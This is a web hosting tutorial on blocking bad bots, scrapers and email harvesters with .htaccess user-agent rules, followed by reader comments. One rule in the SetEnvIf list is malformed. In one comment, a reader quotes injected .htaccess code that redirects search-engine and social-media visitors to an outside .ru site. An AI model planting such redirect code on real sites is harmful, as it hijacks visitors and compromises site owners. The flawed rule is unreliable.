Block Bad robots, spiders, crawlers and harvesters
Web Hosting Articles »
A simple guide to .htaccess »
Block Bad robots, spiders, crawlers and harvesters
There are lots of examples across the internet that use ModRewrite. We will provide such an examample as well. However, what to do when ModRewrite is not available? We can use SetEnv directive with combination with FilesMatch.
SetEnvIfNoCase user-agent "^BlackWidow" bad_bot=1
SetEnvIfNoCase user-agent "^Bot\ mailto:craftbot@yahoo.com" bad_bot=1
SetEnvIfNoCase user-agent "^ChinaClaw" bad_bot=1
SetEnvIfNoCase user-agent "^Custo" bad_bot=1
SetEnvIfNoCase user-agent "^DISCo" bad_bot=1
SetEnvIfNoCase user-agent "^Download\ Demon" bad_bot=1
SetEnvIfNoCase user-agent "^eCatch" bad_bot=1
SetEnvIfNoCase user-agent "^EirGrabber" bad_bot=1
SetEnvIfNoCase user-agent "^EmailSiphon" bad_bot=1
SetEnvIfNoCase user-agent "^EmailWolf" bad_bot=1
SetEnvIfNoCase user-agent "^Express\ WebPictures" bad_bot=1
SetEnvIfNoCase user-agent "^ExtractorPro" bad_bot=1
SetEnvIfNoCase user-agent "^EyeNetIE" bad_bot=1
SetEnvIfNoCase user-agent "^FlashGet" bad_bot=1
SetEnvIfNoCase user-agent "^GetRight" bad_bot=1
SetEnvIfNoCase user-agent "^GetWeb!" bad_bot=1
SetEnvIfNoCase user-agent "^Go!Zilla" bad_bot=1
SetEnvIfNoCase user-agent "^Go-Ahead-Got-It" bad_bot=1
SetEnvIfNoCase user-agent "^GrabNet" bad_bot=1
SetEnvIfNoCase user-agent "^Grafula" bad_bot=1
SetEnvIfNoCase user-agent "^HMView" bad_bot=1
SetEnvIfNoCase user-agent “HTTrack” bad_bot=1
SetEnvIfNoCase user-agent "^Image\ Stripper" bad_bot=1
SetEnvIfNoCase user-agent "^Image\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent "Indy\ Library" [NC,OR]
SetEnvIfNoCase user-agent "^InterGET" bad_bot=1
SetEnvIfNoCase user-agent "^Internet\ Ninja" bad_bot=1
SetEnvIfNoCase user-agent "^JetCar" bad_bot=1
SetEnvIfNoCase user-agent "^JOC\ Web\ Spider" bad_bot=1
SetEnvIfNoCase user-agent "^larbin" bad_bot=1
SetEnvIfNoCase user-agent "^LeechFTP" bad_bot=1
SetEnvIfNoCase user-agent "^Mass\ Downloader" bad_bot=1
SetEnvIfNoCase user-agent "^MIDown\ tool" bad_bot=1
SetEnvIfNoCase user-agent "^Mister\ PiX" bad_bot=1
SetEnvIfNoCase user-agent "^Navroad" bad_bot=1
SetEnvIfNoCase user-agent "^NearSite" bad_bot=1
SetEnvIfNoCase user-agent "^NetAnts" bad_bot=1
SetEnvIfNoCase user-agent "^NetSpider" bad_bot=1
SetEnvIfNoCase user-agent "^Net\ Vampire" bad_bot=1
SetEnvIfNoCase user-agent "^NetZIP" bad_bot=1
SetEnvIfNoCase user-agent "^Octopus" bad_bot=1
SetEnvIfNoCase user-agent "^Offline\ Explorer" bad_bot=1
SetEnvIfNoCase user-agent "^Offline\ Navigator" bad_bot=1
SetEnvIfNoCase user-agent "^PageGrabber" bad_bot=1
SetEnvIfNoCase user-agent "^Papa\ Foto" bad_bot=1
SetEnvIfNoCase user-agent "^pavuk" bad_bot=1
SetEnvIfNoCase user-agent "^pcBrowser" bad_bot=1
SetEnvIfNoCase user-agent "^RealDownload" bad_bot=1
SetEnvIfNoCase user-agent "^ReGet" bad_bot=1
SetEnvIfNoCase user-agent "^SiteSnagger" bad_bot=1
SetEnvIfNoCase user-agent "^SmartDownload" bad_bot=1
SetEnvIfNoCase user-agent "^SuperBot" bad_bot=1
SetEnvIfNoCase user-agent "^SuperHTTP" bad_bot=1
SetEnvIfNoCase user-agent "^Surfbot" bad_bot=1
SetEnvIfNoCase user-agent "^tAkeOut" bad_bot=1
SetEnvIfNoCase user-agent "^Teleport\ Pro" bad_bot=1
SetEnvIfNoCase user-agent "^VoidEYE" bad_bot=1
SetEnvIfNoCase user-agent "^Web\ Image\ Collector" bad_bot=1
SetEnvIfNoCase user-agent "^Web\ Sucker" bad_bot=1
SetEnvIfNoCase user-agent "^WebAuto" bad_bot=1
SetEnvIfNoCase user-agent "^WebCopier" bad_bot=1
SetEnvIfNoCase user-agent "^WebFetch" bad_bot=1
SetEnvIfNoCase user-agent "^WebGo\ IS" bad_bot=1
SetEnvIfNoCase user-agent "^WebLeacher" bad_bot=1
SetEnvIfNoCase user-agent "^WebReaper" bad_bot=1
SetEnvIfNoCase user-agent "^WebSauger" bad_bot=1
SetEnvIfNoCase user-agent "^Website\ eXtractor" bad_bot=1
SetEnvIfNoCase user-agent "^Website\ Quester" bad_bot=1
SetEnvIfNoCase user-agent "^WebStripper" bad_bot=1
SetEnvIfNoCase user-agent "^WebWhacker" bad_bot=1
SetEnvIfNoCase user-agent "^WebZIP" bad_bot=1
SetEnvIfNoCase user-agent "^Widow" bad_bot=1
SetEnvIfNoCase user-agent "^WWWOFFLE" bad_bot=1
SetEnvIfNoCase user-agent "^Xaldon\ WebSpider" bad_bot=1
SetEnvIfNoCase user-agent "^Zeus" bad_bot=1
<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</FilesMatch>
How it works? If the string or regular expression matches the user-agent HTTP header it sets the bad_bot environment variable. Then in the FilesMatch we tell the server to deny access (show Forbidden page) to all users/bots that did match any of the strings above.
And of course here it is the ModRewrite based example:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
What it does? The RewriteCond looks for a string or regular expression that matches. In case that there is a match it shows a Forbidden Error page.
- How to block users from accessing your site based on their IP address
- How to prevent or allow directory listing?
- How to change the error documents – 404 Page Not Found, etc
- Using .htaccess for password protecting your folders
- Using .htaccess to block referrer spam
- Disable Hot-Linking of images and other files
- Redirect URLs using .htaccess
- Introduction to mod_rewrite and some basic examples
- Force SSL/https using .htaccess and mod_rewrite
- 301 Permanent redirects for parked domain names
- Enable CGI, SSI with .htaccess
- How to add Mime-Types using .htaccess
- Change default directory page
- Block Bad robots, spiders, crawlers and harvesters
- Make PHP to work in your HTML files with .htacess
- Change PHP variables using .htaccess
- HTTP Authentication with PHP running as CGI/SuExec
- Force www vs non-www to avoid duplicate content on Google
- Duplicate content fix index.html vs / (slash only)
Comments 21 >>
Just Helping Said,
Dec 03, 2006 @ 01:02
The line ending with "Indy\ Library" [NC,OR] needs a "bad_bot=1" at the end of it.
Nox Said,
Question: What does this entries...
(Mail?)
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
Why have HTTrack and Indy not the ^ Symbol?
thx
Jan 18, 2008 @ 05:42
Awesome - Thanks for the Great PostingQuestion: What does this entries...
(Mail?)
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
Why have HTTrack and Indy not the ^ Symbol?
thx
eligio Said,
Jan 18, 2008 @ 10:46
awesome list! already installed on my game site, hope it work. thanks :D
Dmitry Agafonov Said,
Sep 12, 2009 @ 01:41
Be careful, blindly copying the list, you can prevent a lot of perfectly harmless users. For example FlashGet, a download manager and not a bot. I recommend to look at server logs, and find the User-Agent's those robots that are coming to your site, and prevent it to you. So is this approach will be useful in terms of load on the server.
Wondering Said,
Oct 18, 2009 @ 00:34
Where do you put this code? In a robot.txt or on the html page?
Cenk Said,
Wondering:
In .htaccess file on the root directory.
Oct 21, 2009 @ 03:32
Thanks. Great post!Wondering:
In .htaccess file on the root directory.
ganool Said,
thx buddy,,
u save my VPS..
please update it if there is a new bad bot...
because we know that bad bot can change their http_user_agent
Jan 24, 2010 @ 08:46
GOD..thx buddy,,
u save my VPS..
please update it if there is a new bad bot...
because we know that bad bot can change their http_user_agent
teleport pro Said,
Sep 19, 2010 @ 10:53
After copy/paste the codes to .htaccess in server root i still can use the teleport pro to download all the website contents
enigma1 Said,
Let aside the fact the various scraping tools customize the user agent for the operator, browsers, firewalls and other installed tools have options for the user to setup the headers anyway he likes.
You cannot rely on client headers to identify something. The only reliable field is the remote ip/port
$ip = $_SERVER['REMOTE_ADDR'];
At best you can validate from the headers the intention of the client whether he wants to enter as a spider or human using the user agent. But that's good only for the popular spiders who carry documented signatures. And even that needs to be cross-references with the IP.
Sep 19, 2010 @ 11:30
It's a total waste of time to rely on the user agent header to identify who's the client.Let aside the fact the various scraping tools customize the user agent for the operator, browsers, firewalls and other installed tools have options for the user to setup the headers anyway he likes.
You cannot rely on client headers to identify something. The only reliable field is the remote ip/port
$ip = $_SERVER['REMOTE_ADDR'];
At best you can validate from the headers the intention of the client whether he wants to enter as a spider or human using the user agent. But that's good only for the popular spiders who carry documented signatures. And even that needs to be cross-references with the IP.
Ashwini - UnicHost Said,
If anybody wants to go further, can use temporary IP block with multiple requests more than 20/sec or as per your site requirement, within the firewall settings. It helps a lot.
Thanks for sharing.
Ashwini.
Dec 25, 2010 @ 15:28
I have already implemented that while working on the project. If anybody wants to go further, can use temporary IP block with multiple requests more than 20/sec or as per your site requirement, within the firewall settings. It helps a lot.
Thanks for sharing.
Ashwini.
Lotto Cheatah Said,
May 22, 2011 @ 11:20
do I need to manually replace the mod_rewrite.c file with the one above for this .htaccess file to work?
James Said,
Aug 19, 2011 @ 15:52
Dude great list. But here I want to mention that there is a website http://foolbots.com with weird concept of passing the bad robots from one website to another website.
Legendofmir Said,
This script appear in .htaccess:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
I banned this shit site into ZoneAlarm to conect to internet, but i want to disable this option to create this files.
Dec 23, 2011 @ 12:33
I have a huge problem, with Apache on WinXPSP3, all work find but sometime create some .htaccessin all php folder. I want to stop this to make .htaccess files. In what files, and what script must to eneable/disable to stop to create this files.This script appear in .htaccess:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
I banned this shit site into ZoneAlarm to conect to internet, but i want to disable this option to create this files.
Legendofmir Said,
# Satisfy All
Now it's ok!
Marry X-mas to all!!
Dec 24, 2011 @ 02:51
Never maind! I fixed! In httpd.conf from Apache i disabled :# Satisfy All
Now it's ok!
Marry X-mas to all!!
how much are porta potty rental prices Said,
Apr 28, 2013 @ 10:59
The sometimes problematic issue of lavatory facilities for a crowd is neatly solved with portable restroom rentals.. | Previous: Change default directory page | Next: Make PHP to work in your HTML files with .htacess |

Great list. Saved my life/bandwidth! :D